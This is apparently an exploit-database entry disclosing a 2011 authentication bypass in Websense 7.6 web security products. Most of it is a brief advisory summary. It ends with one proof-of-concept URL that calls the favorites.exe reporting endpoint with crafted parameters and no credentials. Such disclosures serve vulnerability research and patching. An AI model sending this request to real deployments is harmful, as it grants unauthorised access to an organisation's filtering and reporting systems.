Websense 7.6 Products - 'favorites.exe' Authentication Bypass

Author: Ben Williams
type: webapps
platform: cgi
port: 
date_added: 2011-12-15  
date_updated: 2015-03-20  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 36459.txt  

source: https://www.securityfocus.com/bid/51087/info

Multiple Websense products are prone to an authentication-bypass vulnerability.

Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.

The following Websense products are affected:

Websense Web Security Gateway Anywhere 7.6
Websense Web Security Gateway 7.6
Websense Web Security 7.6
Websense Web Filter 7.6

https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def